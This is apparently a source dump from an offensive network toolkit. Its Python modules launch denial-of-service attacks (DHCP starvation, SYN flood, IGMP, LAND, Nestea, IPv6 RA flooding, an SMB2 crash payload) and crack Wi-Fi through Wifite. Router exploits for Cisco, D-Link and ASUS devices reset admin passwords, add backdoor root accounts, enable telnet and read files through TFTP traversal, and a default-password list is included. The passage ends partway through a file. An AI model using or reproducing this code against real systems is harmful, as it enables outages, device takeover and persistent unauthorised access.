 8 | """DHCP starvation attack involves firing off DHCP request packets with random
 9 |    MAC addresses.  With this we can exhaust the address space reserved by the
10 |    DHCP server.  This attack can be a viable stepping stone in the introduction
11 |    of a rogue DHCP server.
12 |    http://hakipedia.com/index.php/DHCP_Starvation
13 | """
14 | 
15 | 
16 | class dhcp_starvation(DoS):
17 |     def __init__(self):
18 |         super(dhcp_starvation, self).__init__('DHCP Starvation')
19 |         conf.verb = 0
20 |         self.config.pop("target", None)
21 |         self.config.update({"interval":Zoption(type = "int", 
22 |                                                value = 0.1,
23 |                                                required = False, 
24 |                                 display = "Interval to send advertisements")
25 |                            })
26 |         self.info = """
27 |                     Cause a denial of service against a local DHCP server.
28 |                     This will simply request IP addresses from randomized
29 |                     MAC sources."""
30 | 
31 |     def initialize(self):
32 |         Msg('Beginning DHCP starvation...')
33 |         conf.checkIPaddr = False
34 |         thread = Thread(target=self.starve)
35 |         self.running = True
36 |         thread.start()
37 |         return True
38 | 
39 |     def starve(self):
40 |         """ Starve the network of DHCP leases
41 |         """
42 |         while self.running:
43 |             pkt = Ether(src=RandMAC(), dst="ff:ff:ff:ff:ff:ff")
44 |             pkt /= IP(src="0.0.0.0", dst="255.255.255.255")
45 |             pkt /= UDP(sport=68, dport=67)
46 |             pkt /= BOOTP(chaddr=RandString(12, '0123456789abcdef'))
47 |             pkt /= DHCP(options=[("message-type", 'discover'), 'end'])
48 |             sendp(pkt)
49 |             sleep(self.config['interval'].value)
50 | 


--------------------------------------------------------------------------------
/src/modules/dos/dos.py:
--------------------------------------------------------------------------------
 1 | from module import ZarpModule
 2 | from util import init_app
 3 | from re import search
 4 | from util import Error
 5 | from zoption import Zoption
 6 | import abc
 7 | 
 8 | 
 9 | class DoS(ZarpModule):
10 |     """Abstract denial of service class"""
11 |     __metaclass__ = abc.ABCMeta
12 | 
13 |     def __init__(self, which):
14 |         super(DoS, self).__init__(which)
15 |         self.config.update({"target":Zoption(type = "ip", 
16 |                                              value = None,
17 |                                              required = True, 
18 |                                              display = "Target to DoS")
19 |                            })
20 | 
21 |     def is_alive(self):
22 |         """Check if the target is alive"""
23 |         if not self.config['target'].value is None:
24 |             rval = init_app('ping -c 1 -w 1 %s' % \
25 |                             self.config['target'].value, True)
26 |             up = search('\d.*? received', rval)
27 |             if search('0', up.group(0)) is None:
28 |                 return True
29 |         return False


--------------------------------------------------------------------------------
/src/modules/dos/igmp_nix.py:
--------------------------------------------------------------------------------
 1 | from dos import DoS
 2 | from struct import pack
 3 | from socket import inet_aton
 4 | from scapy.all import send, IP, conf, checksum
 5 | import util
 6 | 
 7 | 
 8 | class igmp_nix(DoS):
 9 |     """ 
10 |         First send an IGMPv2 query, followed by an IGMPv3 query
11 |         with a max response time of 0; results in a division by
12 |         zero in the kernel
13 |     """
14 |     def __init__(self):
15 |         super(igmp_nix, self).__init__('Linux 2.6.36 - 3.2.1 IGMP DoS')
16 |         conf.verb = 0
17 |         self.info = """
18 |                     Exploits an IGMPv2 DoS in Linux kernel version
19 |                     2.6.36 >= to < 3.2.1.
20 | 
21 |                     More information on the sploit:
22 |                     http://www.exploit-db.com/exploits/18378/            
23 |                     """
24 | 
25 |     def initialize(self):
26 |         igmpv2 = pack("!BBH", 0x11, 0xff, 0) + inet_aton("224.0.0.1")
27 |         igmpv3 = pack("!BBH", 0x11, 0x0, 0) + inet_aton("0.0.0.0") \
28 |                                                     + pack("!BBBB", 0, 0, 0, 0)
29 | 
30 |         igmpv2 = igmpv2[:2] + pack("!H", checksum(igmpv2)) + igmpv2[4:]
31 |         igmpv3 = igmpv3[:2] + pack('!H', checksum(igmpv3)) + igmpv3[4:]
32 | 
33 |         send(IP(dst=self.target, proto=2) / igmpv2)
34 |         send(IP(dst=self.target, proto=2) / igmpv3)
35 | 
36 |         if self.is_alive():
37 |             util.Msg('Host still up.')
38 |         else:
39 |             util.Msg('Host not responding - it\'s either down or '
40 |                                                 'rejecting our probes.')
41 | 


--------------------------------------------------------------------------------
/src/modules/dos/land_dos.py:
--------------------------------------------------------------------------------
 1 | from scapy.all import *
 2 | from dos import DoS
 3 | import util
 4 | 
 5 | 
 6 | class land_dos(DoS):
 7 |     def __init__(self):
 8 |         super(land_dos, self).__init__('LAND DoS')
 9 |         conf.verb = 0
10 |         self.info = """
11 |                     Oldie but a goodie.  This exploits the classic LAND attack
12 |                     against Windows machines.  Essentially we set the source 
13 |                     equal to the destination, which causes a loop and
14 |                     eventually a crash.
15 | 
16 |                     http://insecure.org/sploits/land.ip.DOS.html
17 |                     """
18 | 
19 |     def initialize(self):
20 |         target = self.config['target'].value
21 |         pkt = IP(src=target, dst=target)
22 |         pkt /= TCP(sport=134, dport=134)
23 | 
24 |         while True:
25 |             print '[!] DoSing %s...' % target
26 |             send(pkt)
27 | 
28 |             if self.is_alive():
29 |                 util.Msg('Host appears to still be up.')
30 |                 try:
31 |                     tmp = raw_input('[!] Try again? [Y/n] ')
32 |                 except Exception:
33 |                     break
34 |                 if 'n' in tmp.lower():
35 |                     break
36 |             else:
37 |                 util.Msg('Host not responding!')
38 |                 break


--------------------------------------------------------------------------------
/src/modules/dos/ndp_dos.py:
--------------------------------------------------------------------------------
 1 | import util
 2 | from time import sleep
 3 | from scapy.all import *
 4 | from dos import DoS
 5 | from threading import Thread
 6 | from zoption import Zoption
 7 | 
 8 | 
 9 | class ndp_dos(DoS):
10 |     """ This is not patched by Microsoft.  Windows 7 and 8 are vulnerable,
11 |         as well as a handful of (U|L)inux boxes.  IPv6 NDP was designed to
12 |         replace the DHCP protocol.  When a system picks up an ICMPv6 Router
13 |         Advertisement, it is essentially forcing the system to update their
14 |         local networking information for the new router.  This DoS's the
15 |         system's IPv6 networking.  When the network is flooded with these
16 |         ICMPv6 RA's, the system's are hosed at 100% processor usage as they
17 |         scramble to update routing tables, address info, etc.
18 | 
19 |         http://www.mh-sec.de/downloads/mh-RA_flooding_CVE-2010-multiple.txt
20 |     """
21 |     def __init__(self):
22 |         super(ndp_dos, self).__init__('IPv6 Neighbor Discovery Protocol RA DoS')
23 |         conf.verb = 0
24 |         self.config.pop("target", None)
25 |         self.config.update({"interval":Zoption(type = "int", 
26 |                                                value = 0.1,
27 |                                                required = False, 
28 |                                   display = "Interval to send advertisements"),
29 |                             "prefix":Zoption(type = "str", 
30 |                                       value = "ba11:a570::",
31 |                                       required = False, 
32 |                                       display = "Fake router IPv6 address"),
33 |                             "count":Zoption(type = "int", 
34 |                                      value = -1,
35 |                                      required = False,
36 |                   display = "Number of advertisements to send (-1 infinite)")
37 |                            })
38 |         self.info = """
39 |                     Exploits an unpatched vulnerability in the way Windows 7/8 handle
40 |                     IPv6 NDP router advertisements.  After we send enough requests,
41 |                     eventually the box consumes itself.
42 | 
43 |                     http://www.mh-sec.de/downloads/mh-RA_flooding_CVE-2010-multiple.txt
44 |                     """
45 | 
46 |     def initialize(self):
47 |         util.Msg('Starting Router Advertisement...')
48 | 
49 |         thread = Thread(target=self.spam)
50 |         self.running = True
51 |         thread.start()
52 |         return True
53 | 
54 |     def spam(self):
55 |         """ Spam the RA's based on user config
56 |         """
57 |         # build the forged packet
58 |         pkt = IPv6(dst='ff02::1')
59 |         pkt /= ICMPv6ND_RA()
60 |         pkt /= ICMPv6NDOptPrefixInfo(prefixlen=64, 
61 |                 prefix=self.config['prefix'].value)
62 | 
63 |         cnt = 0
64 |         while self.running:
65 |             if self.config['count'].value > 0 and \
66 |                                     cnt >= self.config['count'].value:
67 |                 self.running = False
68 |                 break
69 | 
70 |             send(pkt)
71 |             cnt += 1
72 |             sleep(self.config['interval'].value)


--------------------------------------------------------------------------------
/src/modules/dos/nestea_dos.py:
--------------------------------------------------------------------------------
 1 | import util
 2 | from scapy.all import *
 3 | from dos import DoS
 4 | 
 5 | 
 6 | class nestea_dos(DoS):
 7 |     """ Linux-equivalent to the Teardrop DoS, works on 2.0 and 2.1.
 8 |         Attack works by sending fragmented datagram pairs to a host.  The
 9 |         first host begins at offset 0 (first packet), with a payload of N.
10 |         The following packet is set to overlap within the previous fragment.
11 |     """
12 |     def __init__(self):
13 |         super(nestea_dos, self).__init__('Nestea DoS')
14 |         conf.verb = 0
15 |         self.info = """
16 |                     Linux-equivalent to the teardrop attack, this sends 
17 |                     fragmented datagram packets with overlapping payloads."""
18 | 
19 |     def initialize(self):
20 |         target = self.config['target'].value
21 |         try:
22 |             pkt1 = IP(dst=target, id=42, flags="MF") / UDP() / ("X" * 10)
23 |             pkt2 = IP(dst=target, id=42, frag=48) / ("X" * 116)
24 |             pkt3 = IP(dst=target, id=42, flags="MF") / UDP() / ("X" * 224)
25 |             while True:
26 |                 util.Msg('DoSing %s...' % target)
27 |                 send(pkt1)
28 |                 send(pkt2)
29 |                 send(pkt3)
30 | 
31 |                 if self.is_alive():
32 |                     util.Msg('Host appears to still be up.')
33 |                     try:
34 |                         tmp = raw_input('[!] Try again? [Y/n] ')
35 |                     except Exception:
36 |                         break
37 |                     if 'n' in tmp.lower():
38 |                         break
39 |                 else:
40 |                     util.Msg('Host not responding!')
41 |                     break
42 |         except KeyboardInterrupt:
43 |             return
44 |         except Exception:
45 |             util.Error('Error with given address.  Could not complete DoS.')
46 |             return
47 | 


--------------------------------------------------------------------------------
/src/modules/dos/nud.py:
--------------------------------------------------------------------------------
 1 | from scapy.all import *
 2 | from threading import Thread
 3 | from dos import DoS
 4 | import util
 5 | 
 6 | 
 7 | class nud(DoS):
 8 |     """ Exploits a flaw in the Neighbor Unreachability Detection (NUD) mechanism
 9 |     in the NDP IPv6 suite.  This will listen for unicast Neighbor Solicitations
10 |     and respond, no matter if the dest node is alive or not.  In the event that
11 |     a node is down, or fake node entries are present in the system's cache, the
12 |     host will continue to send packets because NUD has not had a chance to
13 |     remediate the issue.
14 | 
15 |     Enabling a sniffer will allow you to view all sent data.
16 |     """
17 |     def __init__(self):
18 |         super(nud, self).__init__('IPv6 Neighbor Unreachability Detection DoS')
19 |         self.running = False
20 |         self.dump = False
21 |         conf.verb = 0
22 |         self.config.pop("target", None)
23 |         self.info = """
24 |                     Listens for Neighbor Solicitations and responds to them
25 |                     automatically.  In the event that the destination node is
26 |                     dead, the packets destined for it will be null routed."""
27 | 
28 |     def initialize(self):
29 |         """initialize the NUD dos"""
30 |         util.Msg('Starting NUD DoS listener...')
31 |         self.running = True
32 |         dthread = Thread(target=self.listener)
33 |         dthread.start()
34 |         return 'NuD DoS Listener'
35 | 
36 |     def handler(self, pkt):
37 |         """Listen for neighbor solicitations"""
38 |         if ICMPv6ND_NS in pkt:
39 |             v6_type = pkt[ICMPv6ND_NS].type
40 |             if v6_type is 135:
41 |                 # respond
42 |                 npkt = IPv6(dst=pkt[IPv6].src, src=pkt[IPv6].dst)
43 |                 npkt /= ICMPv6ND_NA()
44 |                 send(npkt, count=1)
45 |                 log_msg('Responded to %s' % pkt[IPv6].src)
46 | 
47 |     def stop_caller(self):
48 |         """Sniffer callback"""
49 |         if self.running:
50 |             return True
51 |         util.debug('NUDDos shutting down..')
52 |         return False
53 | 
54 |     def listener(self):
55 |         """listen for IPv6 packets"""
56 |         try:
57 |             while self.running:
58 |                 sniff(filter='ip6', store=0, prn=self.handler,
59 |                                 stopper=self.stop_caller, stopperTimeout=3)
60 |         except Exception, e:
61 |             util.Error('%s' % e)
62 | 
63 |     def view(self):
64 |         util.Msg('NUD DoS...')
65 |         self.dump = True
66 |         raw_input()
67 |         self.dump = False
68 |         return


--------------------------------------------------------------------------------
/src/modules/dos/smb2_dos.py:
--------------------------------------------------------------------------------
 1 | import socket
 2 | import util
 3 | from dos import DoS
 4 | 
 5 | 
 6 | class smb2_dos(DoS):
 7 |     """ Exploit a & in an SMB header.  Triggers in Vista Sp1/sp2/Server 2008/sp2
 8 |         and windows 7 RC (unconfirmed in win7 sp1)
 9 |         https://cve.mitre.org/cgi-bin/cvename.cgi?name=2009-3103
10 |     """
11 | 
12 |     def __init__(self):
13 |         super(smb2_dos, self).__init__('SMB2 DoS')
14 |         self.info = """
15 |                     Exploits a vulnerability in an SMB header, causing a DoS 
16 |                     in the host.
17 | 
18 |                     Windows Vista SP1/SP2, Server 2008/SP2, and Windows 7 RC
19 |                     are all affected.
20 |                     """
21 | 
22 |     def initialize(self):
23 |         """ Initialize the DoS
24 |         """
25 |         try:
26 |             util.Msg("Sending payload...")
27 |             pkt = (
28 |                 "\x00\x00\x00\x90"
29 |                 "\xff\x53\x4d\x42"
30 |                 "\x72\x00\x00\x00"
31 |                 "\x00\x18\x53\xc8"
32 |                 "\x00\x26"
33 |                 "\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\xff\xff\xff\xfe"
34 |                 "\x00\x00\x00\x00\x00\x6d\x00\x02\x50\x43\x20\x4e\x45\x54"
35 |                 "\x57\x4f\x52\x4b\x20\x50\x52\x4f\x47\x52\x41\x4d\x20\x31"
36 |                   "\x2e\x30\x00\x02\x4c\x41\x4e\x4d\x41\x4e\x31\x2e\x30\x00"
37 |                 "\x02\x57\x69\x6e\x64\x6f\x77\x73\x20\x66\x6f\x72\x20\x57"
38 |                  "\x6f\x72\x6b\x67\x72\x6f\x75\x70\x73\x20\x33\x2e\x31\x61"
39 |                 "\x00\x02\x4c\x4d\x31\x2e\x32\x58\x30\x30\x32\x00\x02\x4c"
40 |                 "\x41\x4e\x4d\x41\x4e\x32\x2e\x31\x00\x02\x4e\x54\x20\x4c"
41 |                 "\x4d\x20\x30\x2e\x31\x32\x00\x02\x53\x4d\x42\x20\x32\x2e"
42 |                 "\x30\x30\x32\x00")
43 | 
44 |             sock = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
45 | 
46 |             sock.connect((self.config['target'].value, 445))
47 |             sock.send(pkt)
48 |             sock.close()
49 | 
50 |             if self.is_alive():
51 |                 util.Msg('Host appears to be up')
52 |             else:
53 |                 util.Msg('Host is not responding - '
54 |                             'it is either down or rejecting our probes.')
55 |         except Exception:
56 |             util.Error('Remote host not susceptible to vulnerability.')
57 |             return
58 | 


--------------------------------------------------------------------------------
/src/modules/dos/tcp_syn.py:
--------------------------------------------------------------------------------
 1 | from scapy.all import *
 2 | from threading import Thread
 3 | from dos import DoS
 4 | from util import Msg
 5 | from zoption import Zoption
 6 | 
 7 | 
 8 | class tcp_syn(DoS):
 9 |     def __init__(self):
10 |         """ Simple TCP SYN flooder.  Absolutely nothing fancy, and could
11 |             probably use some love.
12 |         """
13 |         super(tcp_syn, self).__init__('TCP SYN')
14 |         conf.verb = 0
15 |         self.config.update({"port":Zoption(type = "int", 
16 |                                     value = 80,
17 |                                     required = False, 
18 |                                     display = "Attack port"),
19 |                             "count":Zoption(type = "int", 
20 |                                      value = -1,
21 |                                      required = False,
22 |                       display = "Number of packets to send (-1 infinite)")
23 |                            })
24 |         self.info = """
25 |                     Very basic TCP SYN flooder that just spams SYN packets
26 |                     towards the host/port.
27 |                     """
28 | 
29 |     def initialize(self):
30 |         Msg('Flooding \'%s\'...' % self.config['target'].value)
31 |         thread = Thread(target=self.flood)
32 |         self.running = True
33 |         thread.start()
34 |         return True
35 | 
36 |     def flood(self):
37 |         """ Send packets
38 |         """
39 |         pkt = IP(dst=self.config['target'].value)
40 |         pkt /= TCP(dport=self.config['port'].value,
41 |                                                     window=1000, flags='S')
42 |         cnt = 0
43 |         while self.running:
44 |             if self.config['count'].value > 0 and \
45 |                 cnt >= self.config['count'].value:
46 |                 break
47 | 
48 |             send(pkt)
49 |             cnt += 1
50 |         self.shutdown()
51 | 
52 |     def session_view(self):
53 |         """ return ip/port of spammed host
54 |         """
55 |         return "%s:%d" % (self.config['target'].value,
56 |                           self.config['port'].value)


--------------------------------------------------------------------------------
/src/modules/parameter/__init__.py:
--------------------------------------------------------------------------------
1 | __all__ = ['ap_crack','router_pwn', 'slarpc','switchover']
2 | 


--------------------------------------------------------------------------------
/src/modules/parameter/ap_crack.py:
--------------------------------------------------------------------------------
 1 | import util
 2 | import os
 3 | from parameter import Parameter
 4 | from zoption import Zoption
 5 | 
 6 | 
 7 | class ap_crack(Parameter):
 8 |     """ Interfaces with Wifite to crack APs
 9 |     """
10 |     def __init__(self):
11 |         super(ap_crack, self).__init__('APCrack')
12 |         self.config.update({"mode":Zoption(type = "int", 
13 |                                     value = 1,
14 |                                     required = True, 
15 |                                     display = "Mode to crack",
16 |                                     opts = ['WEP', 'WPA', 'WPS'])
17 |                            })
18 |         self.info = """
19 |                     Harnesses the power of Wifite to crack WEP, WPA, and WPS
20 |                     devices."""
21 | 
22 |     def initialize(self):
23 |         choice = self.config['mode'].value
24 | 
25 |         cmd = []
26 |         while True:
27 |             if choice is 1:
28 |                 cmd = ['python',
29 |                     'src/modules/parameter/wifite.py',
30 |                     '--wep',
31 |                     '--wept', '300',
32 |                     '--nofakeauth']
33 |                 break
34 |             elif choice is 2:
35 |                 cmd = ['python',
36 |                     'src/modules/parameter/wifite.py',
37 |                     '--wpa',
38 |                     '--wpat', '10',
39 |                     '--wpadt', '2']
40 |                 break
41 |             elif choice is 3:
42 |                 cmd = ['python',
43 |                     'src/modules/parameter/wifite.py',
44 |                     '--wps',
45 |                     '--wpst', '5',
46 |                     '--wpsretry', '8']
47 |                 break
48 |             else:
49 |                 return False
50 | 
51 |         try:
52 |             os.system(' '.join(cmd))
53 |         except KeyboardInterrupt:
54 |             pass
55 |         except Exception, j:
56 |             util.Error('Error initializing Wifite: %s' % j)
57 | 
58 | 


--------------------------------------------------------------------------------
/src/modules/parameter/parameter.py:
--------------------------------------------------------------------------------
1 | from module import ZarpModule
2 | 
3 | 
4 | class Parameter(ZarpModule):
5 |     """ Abstract parameter
6 |     """
7 |     def __init__(self, which):
8 |         super(Parameter, self).__init__(which)


--------------------------------------------------------------------------------
/src/modules/parameter/router_pwn.py:
--------------------------------------------------------------------------------
 1 | import importlib
 2 | import routers
 3 | import util
 4 | import stream
 5 | from parameter import Parameter
 6 | 
 7 | 
 8 | class router_pwn(Parameter):
 9 |     """ Router pwn module for managing and pwning routers
10 |     """
11 | 
12 |     def __init__(self):
13 |         super(router_pwn, self).__init__('RouterPwn')
14 |         self.routers = {}
15 |         self.skip_opts = True
16 | 
17 |     def load(self):
18 |         """Load router modules"""
19 |         for router in routers.__all__:
20 |             # relative to zarp.py
21 |             mod = importlib.import_module('modules.parameter.routers.%s'
22 |                                                                     % router)
23 |             self.routers[router] = []
24 |             for vuln in mod.__all__:
25 |                 path = "modules.parameter.routers.%s.%s" % (router, vuln)
26 |                 if util.check_dependency(path):
27 |                     mod = getattr(importlib.import_module(path, 'routers'), vuln)
28 |                     self.routers[router].append(mod)
29 | 
30 |     def initialize(self):
31 |         """ Load router exploits; store {router:[vuln]}
32 |         """
33 |         self.load()
34 |         while True:
35 |             choice = util.print_menu([x for x in self.routers.keys()])
36 |             if choice is 0:
37 |                 del(self.routers)
38 |                 break
39 |             elif choice is -1 or choice > len(self.routers.keys()):
40 |                 pass
41 |             else:
42 |                 router = self.routers[self.routers.keys()[choice - 1]]
43 |                 while True:
44 |                     choice = util.print_menu([x().which for x in router])
45 |                     if choice is 0:
46 |                         break
47 |                     elif choice is -1 or choice > len(router):
48 |                         pass
49 |                     else:
50 |                         stream.initialize(router[choice - 1])
51 | 


--------------------------------------------------------------------------------
/src/modules/parameter/routers/__init__.py:
--------------------------------------------------------------------------------
1 | __all__ = ['cisco', 'dlink', 'linksys', 'netgear', 'asus',
2 | 		   'rosewill', 'zoom']
3 | 


--------------------------------------------------------------------------------
/src/modules/parameter/routers/asus/__init__.py:
--------------------------------------------------------------------------------
1 | __all__ = ['rt56u_change_admin']
2 | 


--------------------------------------------------------------------------------
/src/modules/parameter/routers/asus/rt56u_change_admin.py:
--------------------------------------------------------------------------------
 1 | from urllib import urlencode, urlopen
 2 | import util
 3 | from ..router_vuln import RouterVuln
 4 | 
 5 | 
 6 | class rt56u_change_admin(RouterVuln):
 7 | 
 8 |     def __init__(self):
 9 |         self.router = 'RT-N56U <= v1.0.7f'
10 |         self.vuln = 'Change Admin Password'
11 |         super(rt56u_change_admin, self).__init__()
12 | 
13 |         self.info = """
14 |                     Change the admin password and enable the remote telnet server
15 |                     http://forelsec.blogspot.com/2013/02/asus-rt56u-multiple-vulnerabilities.html
16 |                     """
17 | 
18 |     def initialize(self):
19 |         util.Msg('Changing admin password and enabling remote telnet server...')
20 |         try:
21 |             data = urlencode({'productid':'RT-N56U', 'current_page':'Advanced_System_Content.asp',
22 |                         'next_page':'', 'next_host':'', 'sid_list':'LANHostConfig%3BGeneral%3B',
23 |                         'group_id':'', 'modified':'0', 'action_mode':'+Apply+','first_time':'',
24 |                         'action_script':'','preferred_lang':'EN','wl_ssid2':'wat','firmver':'1.0.7f',
25 |                         'http_passwd':'d3fault','http_passwd2':'d3fault','v_password2':'d3fault',
26 |                         'log_ipaddr':'', 'time_zone':'UCT12', 'ntp_server0':'pool.ntp.org','telnetd':'1'})
27 | 
28 |             response = urlopen("http://%s/start_apply.htm" % 
29 |                                 self.config['target'].value, data).read()
30 | 
31 |             if "You cannot Login unless logout another user first" in response:
32 |                 util.Msg("Another user is logged in.")
33 |             util.Msg('Done.  telnet into %s with \'admin:d3fault\'' % self.ip)
34 |         except Exception, e:
35 |             util.Error('Error: %s' % e)
36 | 


--------------------------------------------------------------------------------
/src/modules/parameter/routers/cisco/__init__.py:
--------------------------------------------------------------------------------
1 | __all__ = [ 'kits_dtraverse', 'ios_full_admin' ]
2 | 


--------------------------------------------------------------------------------
/src/modules/parameter/routers/cisco/ios_full_admin.py:
--------------------------------------------------------------------------------
 1 | from ..router_vuln import RouterVuln
 2 | import util
 3 | import urllib
 4 | 
 5 | 
 6 | class ios_full_admin(RouterVuln):
 7 | 
 8 |     def __init__(self):
 9 |         self.router = 'Cisco IOS 11.x/12.x'
10 |         self.vuln   = 'Full Admin'
11 |         super(ios_full_admin, self).__init__()
12 | 
13 |         self.info = """
14 |                     Exploit a remote admin vulnerability in Cisco IOS 11.x/12.x routers
15 |                     http://www.exploit-db.com/exploits/20975/
16 |                     """
17 | 
18 |     def initialize(self):
19 |         url = 'http://%s/level/' % (self.config['target'].value)
20 |         for idx in range(16, 100):
21 |             url += str(idx) + '/exec/-'
22 |             response = urllib.urlopen(url).read()
23 |             if '200 ok' in response.lower():
24 |                 util.Msg('Device vulnerable.  Connect to %s for admin'
25 |                                           % (self.config['target'].value))
26 |                 return
27 |         util.Msg('Device not vulnerable.')
28 |         return
29 | 


--------------------------------------------------------------------------------
/src/modules/parameter/routers/cisco/kits_dtraverse.py:
--------------------------------------------------------------------------------
 1 | from ..router_vuln import RouterVuln
 2 | import socket
 3 | import util
 4 | 
 5 | 
 6 | class kits_dtraverse(RouterVuln):
 7 | 
 8 |     def __init__(self):
 9 |         self.router = 'CiscoKits 1.0 TFTP'
10 |         self.vuln   = 'Directory Traversal'
11 |         super(kits_dtraverse, self).__init__()
12 | 
13 |         self.info = """
14 |                     Exploit a directory traversal vulnerability
15 |                     http://www.exploit-db.com/exploits/17619/
16 |                     """
17 | 
18 |     def send(self, retr):
19 |         """Send and receive"""
20 |         try:
21 |             sock = socket.socket(socket.AF_INET, socket.SOCK_DGRAM)
22 |             sock.settimeout(5)
23 |             sock.sendto(retr, (self.config['target'].value, 69))
24 |             data = sock.recv(1024)
25 |             sock.close()
26 |         except Exception, e:
27 |             util.Error('Error with host: %s' % e)
28 |             return None
29 |         return data.strip()
30 | 
31 |     def initialize(self):
32 |         try:
33 |             while True:
34 |                 retr = raw_input('C:\\')
35 |                 retr = retr.replace('/', '\\')
36 | 
37 |                 pkt = '\x00\x01'
38 |                 pkt += '../' * 10 + retr + '\x00'
39 |                 pkt += 'netascii\x00'
40 |                 data = self.send(pkt)
41 |                 print data
42 |         except:
43 |             return
44 | 


--------------------------------------------------------------------------------
/src/modules/parameter/routers/default_passwords.py:
--------------------------------------------------------------------------------
 1 | """ Aggregation of default passwords, organized by brand.  Only
 2 |     brands with exploits in zarp are present.
 3 | """
 4 | 
 5 | 
 6 | def default_list(brand):
 7 |     """ Return a list of potential or default username/password
 8 |         combinations for a router.  This is more refined than a
 9 |         brute force attempt with a fat wordlist.
10 |     """
11 |     brand = globals().get(brand)()
12 |     if not brand:
13 |         return None
14 | 
15 |     base = general()
16 | 
17 |     # uniquely combine lists
18 |     base['username'] = list(set(base['username'] + brand['username']))
19 |     base['password'] = list(set(base['password'] + brand['password']))
20 |     return base
21 | 
22 | 
23 | def general():
24 |     """ standard username/password combinations that could be
25 |         applicable to any device.  Each brand should return the
26 |         union of the general set and their specific subset.
27 |     """
28 |     return {'username': ['', 'admin', 'administrator'],
29 |             'password': ['', 'admin', 'administrator', 'password', '1234']
30 |             }
31 | 
32 | 
33 | #
34 | # Brand-specific usernames/passwords
35 | #
36 | def cisco():
37 |     return {'username': ['Cisco', 'cisco', 'Administrator', 'root'],
38 |             'password': ['Cisco', 'cisco', 'Administrator', '_Cisco', 'letmein']
39 |             }
40 | 
41 | 
42 | def asus():
43 |     return {'username': [],
44 |             'password': []
45 |             }
46 | 
47 | 
48 | def rosewill():
49 |     return {'username': [],
50 |             'password': ['guest'],
51 |             }
52 | 
53 | 
54 | def dlink():
55 |     return {'username': [],
56 |             'password': ['public']
57 |             }
58 | 
59 | 
60 | def linksys():
61 |     return {'username': [],
62 |             'password': ['epicrouter']
63 |             }
64 | 
65 | 
66 | def netgear():
67 |     return {'username': [],
68 |             'password': ['netgear1', 'setup', 'Administrator']
69 |             }
70 | 


--------------------------------------------------------------------------------
/src/modules/parameter/routers/dlink/__init__.py:
--------------------------------------------------------------------------------
1 | __all__ = ['backdoor_250n', 'change_admin_2640', 'add_admin_300',
2 | 		   'add_admin_605', 'change_admin_1310', 'get_config_320b'
3 | 		   ]
4 | 


--------------------------------------------------------------------------------
/src/modules/parameter/routers/dlink/add_admin_300.py:
--------------------------------------------------------------------------------
 1 | import util
 2 | import urllib
 3 | from ..router_vuln import RouterVuln
 4 | 
 5 | 
 6 | class add_admin_300(RouterVuln):
 7 | 
 8 |     def __init__(self):
 9 |         self.router = 'DIR-300 v1.04'
10 |         self.vuln   = 'Change Admin Password'
11 |         super(add_admin_300, self).__init__()
12 |     
13 |         self.info = """
14 |                     Modify the default admin password to 'd3fault'
15 |                     http://www.exploit-db.com/exploits/15753/
16 |                     """
17 | 
18 |     def initialize(self):
19 |         util.Msg('Changing admin password to \'d3fault\'...')
20 |         url = 'http://%s/tools_admin.php?NO_NEED_AUTH=1&AUTH_GROUP=0' % self.config['target'].value
21 |         params = urllib.urlencode({'ACTION_POST':1,'admin_name':'admin',
22 |                                    'admin_password1':'d3fault','admin_password2':'d3fault',
23 |                                    'rt_enable_h':1,'rt_port':8080,'rt_ipaddr':'192.168.0.1337'})
24 | 
25 |         try:
26 |             urllib.urlopen(url, params).read()
27 |             util.Msg('Done.  Admin password changed to \'d3fault\'')
28 |         except Exception, e:
29 |             util.Error("Error: %s" % e)
30 |             return
31 | 


--------------------------------------------------------------------------------
/src/modules/parameter/routers/dlink/add_admin_605.py:
--------------------------------------------------------------------------------
 1 | import urllib
 2 | import util
 3 | from ..router_vuln import RouterVuln
 4 | 
 5 | class add_admin_605(RouterVuln):
 6 | 
 7 |     def __init__(self):
 8 |         self.router = 'DIR-605 v2.00'
 9 |         self.vuln   = 'Backdoor Root'
10 |         super(add_admin_605, self).__init__()
11 | 
12 |         self.info = """ 
13 |                     Adds a backdoor root account to the router
14 |                     http://www.exploit-db.com/exploits/18638/
15 |                     """
16 | 
17 |     def initialize(self):
18 |         util.Msg('Adding admin \'adm4n\' with password \'d3fault\'')
19 |         url = 'http://%s/tools_admin.php?NO_NEED_AUTH=1&AUTH_GROUP=0' % self.config['target'].value
20 |         params = urllib.urlencode({'ACTION_POST':1, 'admin_name':'adm4n','admin_password':'d3fault',
21 |                                     'admin_password2':'d3fault'})
22 |         try:
23 |             response = urllib.urlopen(url,params).read()
24 |             util.Msg('Done.  Connect to %s with \'adm4n:d3fault\'' % self.config['target'].value)
25 |         except Exception, e:
26 |             util.Error('Failed: %s' % e)
27 |             return
28 | 


--------------------------------------------------------------------------------
/src/modules/parameter/routers/dlink/backdoor_250n.py:
--------------------------------------------------------------------------------
 1 | import util
 2 | import paramiko
 3 | from ..router_vuln import RouterVuln
 4 | 
 5 | 
 6 | class backdoor_250n(RouterVuln):
 7 | 
 8 |     def __init__(self):
 9 |         self.router = 'DSR-250N'
10 |         self.vuln   = 'Add Admin'
11 |         super(backdoor_250n, self).__init__()
12 |         
13 |         self.info = """
14 |                     Add persistent root account.
15 |                     http://www.exploit-db.com/exploits/22930/
16 |                     """
17 | 
18 |     def initialize(self):
19 |         util.Msg('Adding \'r00t:d3fault\'...')
20 |         try:
21 |             ssh = paramiko.SSHClient()
22 |             ssh.set_missing_host_key_policy(paramiko.AutoAddPolicy())
23 |             connection = ssh.connect(self.config['target'].value,
24 |                            username='admin', password='admin', timeout=3.0)
25 |             channel = connection.get_transport().open_session()
26 |             # add user
27 |             channel.exec_command('system users edit 1')
28 |             channel.exec_command('username r00t')
29 |             channel.exec_command('password d3fault')
30 |             channel.exec_command('save')
31 |             connection.close()
32 |         except paramiko.AuthenticationException:
33 |             util.Error('Default credentials disabled/changed.')
34 |         except Exception, e:
35 |             util.Error('Error: %s' % e)
36 |             return
37 | 
38 |         util.Msg('Done.')
39 | 


--------------------------------------------------------------------------------
/src/modules/parameter/routers/dlink/change_admin_1310.py:
--------------------------------------------------------------------------------
 1 | import urllib
 2 | import util
 3 | from ..router_vuln import RouterVuln
 4 | 
 5 | 
 6 | class change_admin_1310(RouterVuln):
 7 | 
 8 |     def __init__(self):
 9 |         self.router = 'WBR-1310 v2.0'
10 |         self.vuln   = 'Change Admin Password'
11 |         super(change_admin_1310, self).__init__()
12 |     
